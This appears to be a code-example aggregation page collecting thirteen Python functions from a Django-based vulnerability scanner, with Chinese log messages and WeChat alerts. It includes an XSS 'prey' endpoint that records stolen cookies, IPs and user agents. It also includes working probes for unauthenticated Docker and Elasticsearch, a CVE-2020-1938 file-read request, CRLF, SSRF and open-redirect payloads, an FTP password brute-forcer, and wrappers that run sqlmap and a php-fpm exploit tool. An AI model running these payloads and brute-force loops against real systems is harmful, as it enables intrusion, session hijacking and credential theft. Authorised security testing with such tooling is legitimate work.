Ejemplo n.º 1
0
def xss_prey(request):
    if 'HTTP_X_FORWARDED_FOR' in request.META:
        ip = request.META['HTTP_X_FORWARDED_FOR']
    else:
        try:
            ip = request.META['REMOTE_ADDR']
        except:
            ip = '0.0.0.0'

    ip = ip.replace("'", "\'")
    domain = request.GET.get('domain', 'Unknown').replace("'", "\'")
    user_agent = request.META.get('HTTP_USER_AGENT',
                                  'Unknown').replace("'", "\'")
    # method = requests.method.replace("'","\'")
    full_path = request.get_full_path()
    full_path = unquote(full_path)

    logger.debug(full_path)
    cookie = full_path
    logger.info(cookie)
    try:
        XssPrey.objects.update_or_create(domain=domain,
                                         user_agent=user_agent,
                                         cookie=cookie,
                                         ip=ip)

        title = '发现XSS猎物'
        content = domain

        wechat.send_msg(title, content)
    except Exception as e:
        logger.critical(e)

    return HttpResponse('{"status":"ok"}', content_type='application/json')
Ejemplo n.º 2
0
def start(**kwargs):
    policy = kwargs['policy']

    socket.setdefaulttimeout(2)
    ports = Port.objects.filter(service_name__icontains='docker')
    if not ports:
        logger.debug("[%s] %s" % (plugin, '未匹配到扫描对象'))

    for port in ports:
        port_num = port.port_num
        ip = port.asset.ip

        logger.debug("[%s] [%s] %s" % (plugin, port.id, ip))

        try:
            s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
            s.connect((ip, port_num))
            payload = "GET /containers/json HTTP/1.1\r\nHost: %s:%s\r\n\r\n" % (
                ip, port_num)
            s.send(payload.encode())
            recv = s.recv(1024)
            if b"HTTP/1.1 200 OK" in recv and b'Docker' in recv and b'Api-Version' in recv:
                logger.info(
                    '%-30s%-30s' %
                    ('[$$$]success, ', "[True], this host is vulnerable"))
                desc = 'Docker未授权访问漏洞,获取到如下信息:\n' + str(recv)
                Risk.objects.update_or_create(target=ip,
                                              risk_type='docker未授权访问',
                                              defaults={'desc': desc})
                title = 'docker未授权访问'
                content = desc
                wechat.send_msg(title, content)
        except Exception as e:
            logger.error(e)
Ejemplo n.º 3
0
def start(**kwargs):
    policy = kwargs['policy']
    assets = kwargs['assets']
    socket.setdefaulttimeout(2)
    ports = Port.objects.filter(asset_id__in=assets, port_num=8009)

    for port in ports:
        port_num = port.port_num
        ip = port.asset.ip

        logger.debug("[%s] [%s] %s" % (plugin, port.id, ip))
        try:
            t = Tomcat(ip, port_num)
            _, data = t.perform_request('/hissec{".jsp" if args.rce else ""}', attributes=[
                {'name': 'req_attribute', 'value': ['javax.servlet.include.request_uri', '/']},
                {'name': 'req_attribute', 'value': ['javax.servlet.include.path_info', '/WEB-INF/web.xml']},
                {'name': 'req_attribute', 'value': ['javax.servlet.include.servlet_path', '/']},
            ])
            logger.info('----------------------------')
            res = ''.join([d.data.decode('utf_8') for d in data])
            if "web-app" in res:
                logger.info('%-30s%-30s' % ('[$$$]success, ', "[True], this host is vulnerable"))
                desc = 'cve-2020-1938 漏洞,获取到如下信息:\n' + str(res)
                Risk.objects.update_or_create(port=port, asset=port.asset, risk_type='cve-2020-1938', defaults={'desc': desc})
                title = '发现cve-2020-1938漏洞'
                content = desc
                wechat.send_msg(title, content)
        except Exception as e:
            logger.error(e)

    logger.info('-' * 75)
Ejemplo n.º 4
0
def start(**kwargs):
    policy = kwargs['policy']
    if policy == 'full':
        ports = Port.objects.filter(port_num='9200')
    else:
        ports = Port.objects.exclude(scanned__icontains=plugin).filter(
            port_num=9200)
    if not ports:
        logger.debug("[%s] %s" % (plugin, '未匹配到扫描对象'))

    protocols = ['http', 'https']
    for port in ports:
        ip = port.asset.ip
        for protocol in protocols:
            try:
                url = protocol + "://" + ip + ":" + str(
                    port.port_num) + "/_cat"

                logger.debug("[%s] [%s] %s" % (plugin, port.id, url))
                response = requests.get(url)
                if "/_cat/master" in response.text:
                    logger.info('[$$$]success, 可以匿名访问')
                    Risk.objects.update_or_create(
                        target=url,
                        risk_type='elasticsearch匿名访问',
                        defaults={'desc': 'elasticsearch匿名访问, ' + url})
                    logger.info("[True], this host is vulnerable")
                    title = 'elasticsearch匿名访问'
                    content = url
                    wechat.send_msg(title, content)
            except Exception as e:
                logger.error(e)
        update_scan_status(port, plugin)
Ejemplo n.º 5
0
def check(obj):
    try:
        url = obj.url
    except:
        url = obj.subdomain + '/'
    if url_is_ip(url):
        return
    for payload in payloads:
        _url = url + payload
        logger.debug("[%s] [%s] %s" % (plugin, obj.id, _url))

        headers = settings.HTTP_HEADERS
        try:
            res = requests.get(_url, headers=headers, timeout=10, verify=False, allow_redirects=False)
        except Exception as e:
            # logger.error(e)
            res = None
        if res:
            try:
                if 'dandh811' in res.headers.keys():
                    logger.info('[$$$] %s , 该域名存在漏洞' % _url)

                    Risk.objects.update_or_create(target=url, risk_type='CRLF注入', defaults={"desc": _url + '\n' + payload})
                    title = '发现HTTP头注入漏洞'
                    content = _url
                    wechat.send_msg(title, content)
            except Exception as e:
                logger.critical(e)

        try:
            headers["x-request-id"] = 'test' + payload
            res = requests.get(url, headers=headers, timeout=10, verify=False, allow_redirects=False)
        except Exception as e:
            continue
        try:
            if 'dandh811' in res.headers.keys():
                Risk.objects.update_or_create(target=url, risk_type='CRLF注入', defaults={"desc": _url + '\n' + payload})
                logger.info('success, 该域名存在漏洞')
                title = '发现HTTP头注入漏洞'
                content = _url
                wechat.send_msg(title, content)

        except Exception as e:
            logger.critical(e)

    update_scan_status(obj, plugin)
Ejemplo n.º 6
0
def start(**kwargs):
    webapps = kwargs['webapps']
    policy = kwargs['policy']
    if policy == 'increase':
        webapps = webapps.exclude(scanned__icontains=plugin).order_by('-id')
    if not webapps:
        logger.debug("[%s] %s" % (plugin, '未匹配到扫描对象'))

    denominator = len(webapps)
    molecular = 0
    for webapp in webapps:
        subdomain = webapp.subdomain
        molecular += 1
        if not bool(re.search('[a-z]', subdomain.split(':')[1])):
            continue
        logger.info('-' * 75)
        logger.debug("[%s] [%s] %s" % (plugin, webapp.id, subdomain))

        # if not web_is_online(subdomain.replace('https://', '')):
        #     webapp.delete()   # 判断web是否开启443,关闭则删除
        #     logger.info('[删除] ' + subdomain)
        #     continue

        try:
            a = HTTP_REQUEST_SMUGGLER(subdomain)
            res = a.run()
            if res:
                logger.info(res)
                Risk.objects.update_or_create(target=subdomain, risk_type='HTTP夹带攻击', defaults={'desc': res})
                title = '发现漏洞'
                content = "漏洞类型:" + plugin
                wechat.send_msg(title, content)
        except Exception as e:
            logger.critical(e)
        if molecular == denominator:
            percent = 100.0
            logger.warning('%s [%d/%d]'%(str(percent)+'%', molecular, denominator))
        else:
            percent = round(1.0 * molecular / denominator * 100, 2)
            logger.warning('%s [%d/%d]'%(str(percent)+'%', molecular, denominator))

        update_scan_status(webapp, 'smuggling')
Ejemplo n.º 7
0
def start(**kwargs):
    policy = kwargs['policy']

    if policy == 'full':
        weburls = WebUrls.objects.filter(url__contains='?').order_by('-id')
    else:
        weburls = WebUrls.objects.filter(url__contains='?').exclude(
            scanned__icontains=plugin).order_by('-id')

    if not weburls:
        logger.debug("[%s] %s" % (plugin, '未匹配到扫描对象'))
        return
    keywords = [
        'share', 'wap', 'url', 'link', 'src', 'source', 'target', 'u', '3g',
        'display', 'sourceURl', 'imageURL', 'domain'
    ]
    for weburl in weburls:
        for keyword in keywords:
            _keyword = '?' + keyword + '='
            if _keyword in weburl.url:
                url = weburl.url.split(
                    _keyword)[0] + _keyword + 'http://127.0.0.1:22'
                logger.debug("[%s] [%s] %s" % (plugin, weburl.id, url))
                try:
                    res = requests.get(
                        url, timeout=10, verify=False,
                        allow_redirects=False).content.decode('utf-8')

                    if 'mismatch' in res:
                        logger.info(res)
                        logger.info('[$$$] success, 发现%s漏洞' % url)
                        Risk.objects.update_or_create(target=url,
                                                      risk_type=plugin,
                                                      defaults={'desc': url})

                        title = '发现%s漏洞' % plugin
                        content = '-'
                        wechat.send_msg(title, content)
                    update_scan_status(weburl, plugin)
                except Exception as e:
                    logger.critical(e)
Ejemplo n.º 8
0
def start(**kwargs):
    policy = kwargs['policy']
    if policy == 'full':
        weburls = WebUrls.objects.filter(url__contains='?').order_by('-id')
    else:
        weburls = WebUrls.objects.filter(url__contains='?').exclude(scanned__icontains='sqli').order_by('-id')

    if not weburls:
        logger.debug("[%s] %s" % (plugin, '未匹配到扫描对象'))
        return
    denominator = len(weburls)
    molecular = 0
    for weburl in weburls:
        molecular += 1
        url = weburl.url
        logger.info('-' * 75)
        logger.debug("[%s] [%s] %s" % (plugin, weburl.id, url))
        data = sqlmap(url)
        try:
            if data:
                logger.info(data)
                logger.info('[$$$]success, 发现SQL注入漏洞')
                Risk.objects.update_or_create(target=url, risk_type='SQL注入', defaults={'desc': data})

                title = '发现SQL注入漏洞'
                content = '-'
                wechat.send_msg(title, content)
            else:
                logger.info('未发现漏洞')
            update_scan_status(weburl, 'sqli')
        except Exception as e:
            logger.info('* %s' % e)

        if molecular == denominator:
            percent = 100.0
            logger.info('进度: %s [%d/%d]' % (str(percent)+'%', molecular, denominator))
        else:
            percent = round(1.0 * molecular / denominator * 100, 2)
            logger.info('进度 : %s [%d/%d]' % (str(percent)+'%', molecular, denominator))
Ejemplo n.º 9
0
def start(**kwargs):
    policy = kwargs['policy']
    webapps = kwargs['webapps']

    if policy == 'increase':
        webapps = webapps.filter(other_info__icontains='php/').exclude(
            scanned__icontains=plugin)
    else:
        webapps = webapps.filter(other_info__icontains='php/')

    if not webapps:
        logger.debug("[%s] %s" % (plugin, '未匹配到扫描对象'))

    for webapp in webapps:
        url = webapp.subdomain

        logger.debug("[%s] [%s] %s" % (plugin, webapp.id, url))
        cmd = '/root/go/bin/phuip-fpizdam %s/index.php' % url
        logger.info(cmd)
        p = subprocess.Popen(cmd,
                             shell=True,
                             stdin=subprocess.PIPE,
                             stdout=subprocess.PIPE,
                             stderr=subprocess.PIPE)
        out, err = p.communicate()
        out = out.decode('utf-8')
        logger.info(out)
        logger.error(err.decode('utf-8'))
        if 'success' in out:
            Risk.objects.update_or_create(target=url,
                                          risk_type='php漏洞',
                                          defaults={'desc': cmd})

            logger.info('[$$$]success')
            title = '发现漏洞'
            content = plugin
            wechat.send_msg(title, content)
        update_scan_status(webapp, plugin)
        logger.info('-' * 75)
Ejemplo n.º 10
0
def start(**kwargs):
    webapps = kwargs['webapps']
    policy = kwargs['policy']
    keywords = [
        'next', 'url', 'return', 'redirect_url', 'callback_url', 'callback',
        'r', 'target', 'error', 'errurl', 'error_url', 'redirect',
        'redirect_to', 'jump', 'jump_to', 'to', 'link', 'linkto', 'domain',
        'u', 'continue', 'back_url'
    ]
    payloads = [
        r'\baidu.com', '/baidu.com', '//baidu.com', '///baidu.com',
        '////baidu.com', 'https://[email protected]', '#baidu.com',
        '?baidu.com', r'\\baidu.com', '.baidu', '.baidu.com',
        '///baidu.com//..', '////baidu.com//..', '/http://baidu.com'
    ]
    chrome_options = Options()

    chrome_options.add_argument('--no-sandbox')
    chrome_options.add_argument('--headless')
    chrome_options.add_argument('--disable-dev-shm-usage')
    if policy == 'full':
        weburls = WebUrls.objects.order_by('-id')
    else:
        weburls = WebUrls.objects.exclude(scanned__icontains=plugin)
        webapps = webapps.exclude(scanned__icontains=plugin)

    if not weburls:
        logger.debug("[%s] %s" % (plugin, '未匹配到扫描对象'))
    for weburl in weburls:
        url = parse.unquote(weburl.url, 'utf-8')

        if url_is_ip(url):
            continue
        logger.debug("[%s] [%s] %s" % (plugin, weburl.id, url))

        try:
            browser = webdriver.Chrome(
                executable_path='/opt/tools/chromedriver',
                chrome_options=chrome_options)
        except Exception as e:
            logger.critical(e)
            continue
        risk = False

        parseResult = parse.urlparse(url)
        param_dict = parse.parse_qs(parseResult.query)

        for param in param_dict.keys():

            if param not in keywords:
                continue
            if risk:
                continue

            for payload in payloads:
                _url = url.replace(param + '=' + param_dict[param][0],
                                   param + '=' + payload)
                logger.debug("[%s] [%s] %s" % (plugin, weburl.id, url))
                try:
                    browser.get(url)
                    cur_url = browser.current_url
                    browser.close()
                except Exception as e:
                    continue

                if 'www.baidu' in cur_url:
                    logger.info('[$$$] success, 发现漏洞')
                    Risk.objects.update_or_create(target=url,
                                                  risk_type='开放重定向',
                                                  defaults={"desc": _url})

                    title = '发现开放重定向漏洞'
                    content = '-'
                    wechat.send_msg(title, content)
                    risk = True
        try:
            subprocess.call('pkill chrome', shell=True)
        except Exception as e:
            logger.critical(e)
        finally:
            browser.quit()
        update_scan_status(weburl, plugin)

    if not webapps:
        logger.debug("[%s] %s" % (plugin, 'There are no objects to scan'))
    payloads2 = [
        r'\baidu.com', '/baidu.com', '//baidu.com', '///baidu.com',
        '////baidu.com', '#baidu.com', '?baidu.com', r'\\baidu.com',
        '///baidu.com//..', '////baidu.com//..', '/http://baidu.com'
    ]
    for webapp in webapps:
        try:
            browser = webdriver.Chrome(
                executable_path='/opt/tools/chromedriver',
                chrome_options=chrome_options)
        except Exception as e:
            logger.critical(e)
            continue
        risk = False
        for payload in payloads2:
            if risk:
                continue
            url = webapp.subdomain + payload
            logger.debug("[%s] [%s] %s" % (plugin, webapp.id, url))
            try:
                browser.get(url)
                cur_url = browser.current_url
                browser.close()
            except Exception as e:
                cur_url = 'error'
            if 'www.baidu' in cur_url:
                logger.info('[$$$] success, 发现漏洞')
                Risk.objects.update_or_create(target=url,
                                              risk_type='开放重定向',
                                              defaults={"desc": url})

                title = '发现开放重定向漏洞'
                content = url
                wechat.send_msg(title, content)
                risk = True
        try:
            update_scan_status(webapp, plugin)
            subprocess.call('pkill chrome', shell=True)
        except Exception as e:
            logger.critical(e)
        finally:
            browser.quit()
Ejemplo n.º 11
0
def start(**kwargs):
    policy = kwargs['policy']
    if policy == 'full':
        ports = Port.objects.filter(service_name__icontains=plugin)
    else:
        ports = Port.objects.filter(service_name__icontains=plugin).exclude(
            scanned__icontains=plugin)

    if not ports:
        logger.debug("[%s] %s" % (plugin, '未匹配到扫描对象'))

    has_risk = False

    for port in ports:
        ip = port.asset.ip

        try:
            logger.debug("[%s] [%s] %s" % (plugin, port.id, ip))
            socket.setdefaulttimeout(10)
            s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
            s.connect((ip, port.port_num))
            s.send("success".encode('utf-8'))
            result = s.recv(1024).decode('utf-8')
            if "Environment" in result:
                logger.info('+ Found Vul: \033[0;32m %s, %s\033[0m' %
                            (ip, str(port.port_num)))

                # command = "redis-cli -h %s -p %s" % (ip, port.port_num)
                # res = subprocess.Popen(command, shell=True, stdin=subprocess.PIPE, stdout=subprocess.PIPE,
                #                        stderr=subprocess.PIPE)
                # res.stdin.write(b'info \n')
                # out, err = res.communicate()
                # out = out.decode('utf-8')
                # logger.info(out)
                # desc = 'redis空口令,连接上redis后,执行了info命令,读取到如下信息:\n' + str(out)
                desc = 'zabbix未授权访问'
                Risk.objects.update_or_create(target=port.asset.ip,
                                              risk_type='zabbix漏洞',
                                              defaults={'desc': desc})
                has_risk = True

            # elif "Authentication" in result:
            #     for pass_ in passwords:
            #         s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
            #         s.connect((ip, 6379))
            #         s.send(("AUTH %s\r\n" % pass_).encode('utf-8'))
            #         result = s.recv(1024).decode('utf-8')
            #         if '+OK' in result:
            #             Risk.objects.update_or_create(port=port, defaults={'asset': port.asset,
            #                                                                'risk_type': 'redis弱密码',
            #                                                                'desc': '弱密码 %s' % pass_
            #
            #                                                                })
            #             logger.info(ip + ':' + str(port.port_num) + ' 存在弱口令漏洞,密码:%s' % pass_)
            #             has_risk = True
        except Exception as e:
            logger.error(e)

    if has_risk:
        title = '风险提示'
        content = "发现zookeeper漏洞"
        wechat.send_msg(title, content)

    logger.info('-' * 100)
Ejemplo n.º 12
0
def get_reports(result, webapp):
    # 获取scan_id的扫描报告
    """
        11111111-1111-1111-1111-111111111111    Developer
        21111111-1111-1111-1111-111111111111    XML
        11111111-1111-1111-1111-111111111119    OWASP Top 10 2013
        11111111-1111-1111-1111-111111111112    Quick
    """
    url = result['target']['address']
    count = 0
    while True:
        time.sleep(10)
        res = get_status(result)
        if res == 'completed':
            scan_id = result['scan_id']
            target_id = result['target_id']
            data = {"template_id": "11111111-1111-1111-1111-111111111111",
                    "source": {"list_type": "scans", "id_list": [scan_id]}}
            try:
                response = requests.post(host + "api/v1/reports", data=json.dumps(data), headers=api_header, timeout=30,
                                         verify=False)
                scan_result = response.headers
                loc = scan_result['Location']
            except Exception as e:
                logger.info('* %s' % e)
                sys.exit()
            logger.info('+ %s 扫描完成,正在生成报告 ...' % (time.strftime("%H:%M:%S")))
            while True:
                time.sleep(3)
                try:
                    response = requests.get(host.strip('/') + loc, headers=api_header, timeout=30, verify=False)
                    res = json.loads(response.content.decode('utf-8'))
                    if res['download']:
                        break
                except Exception as e:
                    logger.info(e)
            logger.info('+ %s 报告生成完毕,下载中 ...' % (time.strftime("%H:%M:%S", time.localtime(time.time()))))
            try:
                report_download_url = res['download'][0]
                report_response = requests.get(host.strip('/') + report_download_url, headers=api_header, timeout=30, verify=False)
                report_path_ = '/files/reports/' + scan_id + '.html'
                logger.info('+ 报告存储路径: %s' % report_path_)

                report_path = settings.BASE_DIR + report_path_
                with open(report_path, 'wb') as f:
                    f.write(report_response.content)
            except Exception as e:
                logger.info('* %s' % e)
                sys.exit()
            webapp.report = report_path_

            try:
                response = requests.get(host + 'api/v1/vulnerabilities?q=severity:3', headers=api_header, timeout=30, verify=False)
                res = json.loads(response.content.decode('utf-8'))
                vul_names = []
                ignore_vuls = ['nginx Integer Overflow']
                for vul in res['vulnerabilities']:
                    if vul['target_id'] == target_id and vul['vt_name'] not in ignore_vuls:
                        vul_names.append(vul['vt_name'])

                if vul_names:
                    for vul_name in vul_names:
                        logger.info('--- %s' % vul_name)
                    desc = '\n'.join(vul_names)
                    risk = Risk.objects.update_or_create(target=webapp.subdomain, risk_type='awvs扫描漏洞', defaults={'desc': desc})
                    webapp.risk = risk[0]
                    title = 'awvs扫描漏洞'
                    content = desc
                    wechat.send_msg(title, content)
                else:
                    logger.info('+ 未发现高风险漏洞')

            except Exception as e:
                logger.info('* %s' % e)

            webapp.save()
            logger.info('+ %s 报告已保存' % (time.strftime("%H:%M:%S", time.localtime(time.time()))))
            break
        if res == 'aborted':
            break
Ejemplo n.º 13
0
def start(**kwargs):
    policy = kwargs['policy']
    if policy == 'full':
        ports = Port.objects.filter(service_name__icontains=plugin)
    else:
        ports = Port.objects.exclude(scanned__icontains=plugin).filter(
            service_name__icontains=plugin)
    if not ports:
        logger.debug("[%s] %s" % (plugin, '未匹配到扫描对象'))

    with open(settings.BASE_DIR + 'brute/usernames.txt', 'r') as f:
        usernames = f.readlines()
    with open(settings.BASE_DIR + 'brute/passwords.txt', 'r') as f:
        passwords = f.readlines()

    ftp = ftplib.FTP()
    for port in ports:
        ip = port.asset.ip

        logger.debug("[%s] [%s] %s" % (plugin, port.id, ip))

        try:
            ftp.connect(ip, port.port_num, timeout=5)
            logger.info('ftp端口可以连接')
        except Exception as e:
            logger.error(e)
            port.delete()
            logger.info('FTP端口连接失败,删除端口')
            continue
        try:
            ftp.login('', '')
            logger.info('[$$$] FTP登录成功!')
            Risk.objects.update_or_create(target=ip,
                                          risk_type='ftp匿名登录',
                                          defaults={
                                              'target': ip,
                                              'desc': 'ftp匿名登录'
                                          })
            continue
        except Exception as e:
            logger.error(e)

        for username in usernames:
            username = username.strip()
            for password in passwords:
                password = password.strip()
                try:
                    # logger.debug(username + ':' + password)
                    ftp.login(username, password)

                    logger.info('[$$$] FTP登录成功!')
                    logger.info('[$$$]success,  %s:%s' % (username, password))
                    Risk.objects.update_or_create(
                        target=ip,
                        risk_type='ftp弱口令',
                        defaults={'desc': '%s:%s' % (username, password)})

                    title = 'ftp弱口令'
                    content = '-'
                    wechat.send_msg(title, content)
                except Exception as e:
                    # logger.info(e)
                    pass
        update_scan_status(port, plugin)

        logger.info('-' * 75)